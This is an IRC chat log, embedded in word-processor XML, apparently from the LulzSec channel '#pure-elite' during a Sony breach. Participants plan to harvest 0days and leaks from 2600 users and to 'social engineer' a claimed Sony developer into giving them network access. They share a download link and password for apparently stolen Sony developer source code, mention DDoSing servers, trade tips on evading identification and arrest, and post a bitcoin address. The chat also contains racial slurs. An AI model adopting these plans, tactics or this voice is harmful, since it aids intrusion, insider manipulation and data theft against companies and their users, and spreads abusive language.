        <w:t>Jun 02 16:49:13 trollpoll &lt;anonymous&gt; But yeah, my good friend broke into [REDACTED] Jun 02 16:49:14 sabu I don't have to say this more than one I hope Jun 02 16:49:30 sabu but people on 2600 are not your friends 95% are there to social engineer you Jun 02 16:49:35 sabu to analyze how you talk Jun 02 16:49:36 neuron aye i realize this Jun 02 16:49:39 sabu and make connections Jun 02 16:49:44 sabu I am just reminding you Jun 02 16:49:55 &lt;recursion_&gt; this is the reason why I either dont talk, or I talk completely differently.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:49:56 sabu don't go off and befriend any of them Jun 02 16:49:57 neuron http://reflets.info/sony-takedown-nouvelle-fuite-de- donnees-un-million-de-comptes-utilisateurs-dans-la-nature/ &lt;&lt; first news post Jun 02 16:50:01 sabu if they message you with info Jun 02 16:50:09 trollpoll yes, pretty sure, thats why i dont talk so much, because of my poor english xDDD Jun 02 16:50:11 sabu save it and pastee.org Jun 02 16:50:18 sabu if they give you code or rars or weird urls Jun 02 16:50:31 sabu grab from vps server no dcc nothing thats risky Jun 02 16:50:34 sabu be smart about shit Jun 02 16:50:41 sabu if any of you get owned I'll lol Jun 02 16:51:45 neuron hehe Jun 02 16:51:57 neuron i don't talk to them the same way i talk here thats for sure :P Jun 02 16:52:29 lol i allways talk in broken english to them because i am "from pakistan" Jun 02 16:52:39 joepie91 lol Jun 02 16:52:55 lol you mean i not do good engliush i am learn from book Jun 02 16:53:08 trollpoll i talk like that because i cant speak better xDDDDDDD Jun 02 16:54:13 sabu ok who is in there now?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:54:19 sabu kayla you in there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:54:36 joepie91 in where?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:54:38 sabu let niggers know to msg you 0day / research / leaks Jun 02 16:54:40 sabu in 2600 chan Jun 02 16:54:42 joepie91 a Jun 02 16:54:43 joepie91 ah* Jun 02 16:54:50 sabu you heard kayla?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:55:12 trollpoll i've kicked myself XD Jun 02 16:55:18 trollpoll so im not there anymore Jun 02 16:55:21 lol another protip even if you are american dont spell it "color" use "colour" which is wider used arround the world just saying "color" means you are american Jun 02 16:55:25 lol sbau heard what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:56:15 sabu if you're on 2600 /topic to msg you with 0days or leaks. niggas coming there and giving up lleaks Jun 02 16:56:21 sabu make sure we take advantage of that Jun 02 16:56:25 sabu see what n1ggers got access to Jun 02 16:56:27 sabu that we can use Jun 02 16:57:29 neuron there you go Jun 02 16:58:39 neuron joepie91: i can op you but....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:58:46 joepie91 better not Jun 02 16:58:47 joepie91 I think Jun 02 16:58:53 * lol has quit (A TLS packet with unexpected length was received.) Jun 02 16:58:55 joepie91 actually Jun 02 16:58:59 joepie91 let me hop on from a VPS Jun 02 16:59:01 joepie91 or someshit Jun 02 16:59:05 joepie91 mm Jun 02 16:59:12 joepie91 I don't have an unused vps that is not linkable to me Jun 02 16:59:13 joepie91 &gt;.&gt; Jun 02 16:59:16 sabu how many people are inside the chan?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:59:19 sabu did it grow?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 16:59:27 * lol (parr0t@HA-g80.qfc.p26q8u.IP) has joined #pure-elite Jun 02 16:59:31 joepie91 or actually I do Jun 02 16:59:31 joepie91 maybe Jun 02 17:00:07 joepie91 goddamn Jun 02 17:00:10 joepie91 FUCK YOU W2SERVERS Jun 02 17:00:14 * joepie91 raeg Jun 02 17:00:27 joepie91 changeme:~# uptime Jun 02 17:00:27 joepie91 01:00:23 up 2:10, 1 user, load average: 0.10, 0.03, 0.01 Jun 02 17:00:29 joepie91 come the fuck on Jun 02 17:00:29 trollpoll im there again, im "virtual" Jun 02 17:00:32 trollpoll but, dont op me Jun 02 17:00:36 joepie91 that's the 3rd unannounced reboot Jun 02 17:00:37 joepie91 in 2 weeks Jun 02 17:01:04 * joepie91 is going to move his irc hub elsewhere Jun 02 17:01:22 &lt;recursion_&gt; joepie91: I would. Thats bullshit. Jun 02 17:01:31 joepie91 I've had 4 full days of downtime Jun 02 17:01:33 joepie91 in the past month Jun 02 17:01:39 joepie91 the server is massively laggy Jun 02 17:01:44 joepie91 because it's on a heavily overloaded node Jun 02 17:01:56 joepie91 and it sometimes is so bad Jun 02 17:01:58 joepie91 that I have to wait 10 seconds Jun 02 17:02:01 joepie91 for a response from nickserv Jun 02 17:02:12 joepie91 even for a $24/yr server that is just BAD Jun 02 17:03:27 joepie91 &lt;prosi&gt;#Sony has passed the point where it's better to simply scorch the earth and create a new system from scratch. Jun 02 17:03:28 joepie91 lol Jun 02 17:05:34 * joepie91 should get a Cinfu Jun 02 17:05:50 neuron joepie91: i got a 3 month for $8 so good Jun 02 17:06:09 joepie91 how good is it? as in responsive?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:06:16 neuron its in germany so a bit of lag Jun 02 17:06:20 neuron but its on a 100mbs line Jun 02 17:06:25 joepie91 I'm in europe lol Jun 02 17:06:29 neuron so i ping google from it.. 17.2ms Jun 02 17:06:30 neuron :P Jun 02 17:06:31 neuron so good Jun 02 17:06:35 joepie91 netherlands, more exactly Jun 02 17:06:35 joepie91 mm Jun 02 17:06:36 joepie91 nice Jun 02 17:06:37 joepie91 but Jun 02 17:06:42 joepie91 gimme working 2600 ip Jun 02 17:07:09 joepie91 nvm Jun 02 17:07:16 joepie91 command prompt decided to start working Jun 02 17:07:17 joepie91 sort of Jun 02 17:07:57 &lt;recursion_&gt; upboat, please: http://www.reddit.com/r/technology/comments/hq823/sony_hacked_again_millions_of_usernames_passwords/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17:08:01 &lt;recursion_&gt; if you have an account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:08:34 joepie91 YouAreAPirate = me Jun 02 17:10:03 joepie91 someone +o me? :D Jun 02 17:10:06 joepie91 I mean Jun 02 17:10:09 joepie91 YouAreAPirate Jun 02 17:10:11 joepie91 not joepie91 Jun 02 17:12:13 &lt;recursion_&gt; johnmanthorpe John Manthorpe Jun 02 17:12:13 &lt;recursion_&gt; 50/50 about unvalidated reports that Lulz S has hacked into #Sony Nice trick to gain notoriety.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:12:22 &lt;recursion_&gt; wtf does that mean?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:13:25 neuron Im captianJack btw Jun 02 17:13:25 joepie91 Neuron, Topiary, Sabu, anyone else who might have +o in #lulzsec Jun 02 17:13:31 neuron joepie91: did it Jun 02 17:13:33 joepie91 can has +o on YouAreAPirate Jun 02 17:13:34 joepie91 ag Jun 02 17:13:35 joepie91 ah* Jun 02 17:13:43 joepie91 thankies Jun 02 17:14:11 &lt;recursion_&gt; Mitnick commented on the twitters Jun 02 17:14:18 &lt;recursion_&gt; lawllawlllawllawllawl Jun 02 17:14:23 &lt;recursion_&gt; WUR FAMOUZ Jun 02 17:14:55 neuron i just looked at this guys source for "sonydev.net" Jun 02 17:14:57 trollpoll 144 users and growing Jun 02 17:14:59 neuron it seems ligit.. php file etc Jun 02 17:15:07 neuron still investigating in my vm Jun 02 17:15:11 &lt;recursion_&gt; also the realtime updates on Google are flowing constantly Jun 02 17:15:16 &lt;recursion_&gt; moreso than the 2pac update Jun 02 17:15:24 trollpoll everyone in sec world is commenting right now about lulzsec...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:15:44 &lt;recursion_&gt; yup Jun 02 17:15:44 neuron we are 9k in \o/ Jun 02 17:15:49 sabu if people give you pasteable data pastee.org with encryption and password and link here Jun 02 17:15:52 &lt;recursion_&gt; bitcoin?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:15:56 &lt;recursion_&gt; Neuron: in what?!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:15:59 sabu if someone links you to urls/codes/etc llink here Jun 02 17:16:11 sabu neuron that source you got pastee.org so we can analyze also Jun 02 17:16:19 joepie91 Neuron: 9k wat?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:16:40 kl0ps congratulations!!! that is so funny :D Jun 02 17:16:59 kl0ps u all 13375 :) Jun 02 17:17:01 neuron url: http://www.multiupload.com/726251QMUK Jun 02 17:17:11 neuron pass: 93ght98hq308h5QA$ %Q#$ A#%UYA%YQ Jun 02 17:17:18 neuron kl0ps: your elite also because your part of us :) Jun 02 17:17:23 neuron joepie91: 9k followers on twitter Jun 02 17:17:33 kl0ps thank :) Jun 02 17:17:33 joepie91 IT'S OVER 9000 Jun 02 17:17:36 joepie91 !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:17:45 kl0ps +s Jun 02 17:17:54 neuron supplier = sonic-iso of 2600 Jun 02 17:17:54 sabu 55mb neuron?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:17:56 sabu downloading Jun 02 17:18:06 sabu which site is this for?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:18:08 sabu sonydev.net?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:18:27 neuron aye Jun 02 17:18:44 neuron its a svn pull Jun 02 17:18:50 neuron so technicly you can svn update it Jun 02 17:19:02 neuron im sure we can find the pass somewhere on sony Jun 02 17:19:12 trollpoll 15... r we all here?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:20:45 * Sabu gives channel operator status to [redacted] Recursion_ trollpoll lol Jun 02 17:21:11 &lt;recursion_&gt; Sabu: kill Recursion Jun 02 17:21:17 &lt;recursion_&gt; not this account, the other one Jun 02 17:21:19 &lt;recursion_&gt; obviously/.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:21:27 &lt;recursion_&gt; its screen session is hanging.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:22:10 * Recursion has quit (Killed (Sabu (le sigh))) Jun 02 17:22:39 neuron omg there actually doing it XD Jun 02 17:22:41 neuron this is fucking epic Jun 02 17:22:50 &lt;recursion_&gt; &lt;3 Jun 02 17:22:52 sabu doing what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:23:05 * Recursion_ is now known as Recursion Jun 02 17:23:05 pwnsauce are we getting bit coins?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:23:45 Topiary 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 02 17:23:47 Topiary not got any here so far Jun 02 17:23:52 neuron singing You are a pirate Jun 02 17:24:18 joepie91 Topiary Jun 02 17:24:19 joepie91 http://blockexplorer.com/address/176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 02 17:25:17 sabu analyzing scedev source codes now Jun 02 17:25:27 joepie91 my god Jun 02 17:25:29 joepie91 this VPS is laggy Jun 02 17:25:29 joepie91 lol Jun 02 17:25:37 neuron rgr Jun 02 17:25:45 neuron joepie91: the german one?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:26:36 joepie91 noes Jun 02 17:26:37 joepie91 w2servers Jun 02 17:26:40 joepie91 the czech one Jun 02 17:27:00 neuron ha Jun 02 17:27:00 Recursion seriously guys Jun 02 17:27:05 neuron get the german one trust me Jun 02 17:27:07 Recursion watch the live feed on google.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:27:30 Recursion its moving with a great speed for this only being public for abo0ut an hour Jun 02 17:28:13 neuron Recursion: im on the irc talking to people Jun 02 17:28:21 Recursion on 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:29:24 Recursion Neuron Jun 02 17:30:04 neuron yup Jun 02 17:30:17 neuron Now talking to guy who claims he has a simple way to break into mantech.com Jun 02 17:31:08 trollpoll ok, now that we are so much ppl here, dont you think we need a kind of protocol in case of been caught, something like tell someone (friend, familiy) to enter here an say just a phrase to make the rest know he were caught...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:31:37 Recursion trollpoll: provided everyone keeps shit to themselves Jun 02 17:31:42 Recursion then nothing will happen Jun 02 17:31:52 neuron just incase if i come in here saying Jun 02 17:32:01 neuron "FUCK FUCK SHIT GUYS FUCK! DELETE YOUR SHIT FUCK!" Jun 02 17:32:03 neuron you know :) Jun 02 17:32:06 trollpoll ahahahaha Jun 02 17:32:07 Recursion ditto Jun 02 17:32:08 Recursion lol Jun 02 17:32:23 joepie91 lolol Jun 02 17:32:25 trollpoll if you were caught you wont be able to enter here xDDDDDDDD Jun 02 17:32:38 trollpoll i know, im always in paranoic mode...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:32:58 lol thts how we will know you are caught :D Jun 02 17:33:00 lol when you dont come here :D Jun 02 17:33:12 joepie91 good method to insure yourself Jun 02 17:33:15 trollpoll hahaha Jun 02 17:33:19 joepie91 give one person an archive Jun 02 17:33:21 joepie91 with instructions Jun 02 17:33:27 joepie91 on how to get on here and alert people Jun 02 17:33:31 joepie91 give another person you trust the key Jun 02 17:33:33 Recursion ROFL Jun 02 17:33:34 Recursion .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:33:34 Recursion peruvianidol. RT @GerryDuggan: Sony getting hacked again is like Biggie Smalls' hearse getting shot up.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:33:36 joepie91 make them contact each other somehow Jun 02 17:33:39 joepie91 when you are in trouble Jun 02 17:33:41 trollpoll xDDDDDDD Jun 02 17:35:23 neuron who is bottle_of_rum Jun 02 17:37:34 joepie91 who is voodoo Jun 02 17:37:48 neuron Sabu: whats the word on that source?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:42:19 storm hey Jun 02 17:42:26 storm i just read the twitter Jun 02 17:42:31 storm good lookin' Jun 02 17:42:38 sabu sups Jun 02 17:42:44 storm Sabu Jun 02 17:42:54 storm you douchenozzle. I txted you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:43:08 storm how did I know it was you: cause no one does a fake ass haddem laugh better than you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:43:30 sabu EhehahEHUUEAhhahhauehuUHEHAHHeuaheuhUHAeaheaueAHAUHEAE Jun 02 17:43:31 storm &lt;3 :&gt; Jun 02 17:43:33 storm rofl Jun 02 17:43:57 Topiary seriously how the fuck...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:43:58 storm HauHauHAUHAUHauHauHAUHAUHauHauHAUHAUHauHauHAUHAU Jun 02 17:44:02 Topiary HEuheuheuhUHAhahhaaheuheuhahHAHAHAHEHE Jun 02 17:44:11 sabu storm Jun 02 17:44:15 storm yo Jun 02 17:44:16 sabu my brazil character Jun 02 17:44:18 pwnsauce hey Jun 02 17:44:20 sabu is based off haddem Jun 02 17:44:21 sabu haahhaha Jun 02 17:44:22 storm rofl Jun 02 17:44:31 storm u drop then we talk ok?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:44:37 sabu ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:44:43 storm that's what haddem says Jun 02 17:44:51 sabu yeah Jun 02 17:44:51 storm I DDOS U U COME BACK THEN WE TALK OK?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:45:17 storm btw--#lulzsec is hilarious Jun 02 17:45:24 sabu really? whats going on in there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:45:31 storm it couldn't have worked out any more perfectly Jun 02 17:45:36 storm just us being on the servers we ddos Jun 02 17:45:40 storm and them not saying shit Jun 02 17:45:43 neuron yeah haha Jun 02 17:45:46 sabu topiary/neuron - should we just leak the source code for scedev.net / Jun 02 17:45:50 lol Sabu: come over :D Jun 02 17:45:51 sabu what did neuron say?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:45:58 neuron some guy is saying he can donate a dual xeon to the cause Jun 02 17:45:59 neuron XD Jun 02 17:46:10 lol proberbly to log us tho Jun 02 17:46:24 storm lol: we wouldn't use Windows Jun 02 17:46:26 storm cakes Jun 02 17:46:32 storm :P Jun 02 17:46:43 neuron Sabu: I wouldn't suggest it just yet we could use more of his shit Jun 02 17:46:57 sabu what else is he offering?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:46:58 neuron hes a sony dev :P Jun 02 17:47:05 sabu you serious Jun 02 17:47:05 neuron if we keep quite we can get more Jun 02 17:47:07 sabu so tell him Jun 02 17:47:13 sabu to give us access into sony network Jun 02 17:47:41 neuron ill see he said he was a ex sony dev but has access Jun 02 17:47:43 storm social engineer him into that shit Jun 02 17:47:45 sabu ok Jun 02 17:47:46 sabu so Jun 02 17:47:47 sabu bro Jun 02 17:47:50 sabu what are you doing here talking to us Jun 02 17:47:52 sabu social his ass Jun 02 17:47:53 sabu haha Jun 02 17:47:58 neuron he logged off Jun 02 17:48:02 sabu gay Jun 02 17:48:03 neuron he will be on 2600 Jun 02 17:48:07 neuron idle later so ill talk Jun 02 17:48:08 sabu so he messaged you Jun 02 17:48:10 sabu gave you source Jun 02 17:48:12 sabu llogged off?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:50:05 trollpoll wow 228 users Jun 02 17:50:28 neuron yeah he likes us or something Jun 02 17:50:29 sabu I am about to join as brazil Jun 02 17:50:39 lol xD biggest chan on 2600 we've fully taken over xD Jun 02 17:51:18 trollpoll i've changed my ident, renew my tor address and changed my nick several times...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:51:55 sabu any 2600 admin come on sucking you dicks yet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:53:13 Recursion also, any bitcoin donated?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:54:33 * Neuron has quit (Ping timeout: 121 seconds) Jun 02 17:54:54 joepie91 http://twitter.com/#!/search/sony Jun 02 17:54:56 joepie91 oops.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:55:01 joepie91 :D Jun 02 17:55:33 trollpoll i cant imagine the sony admin faces...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
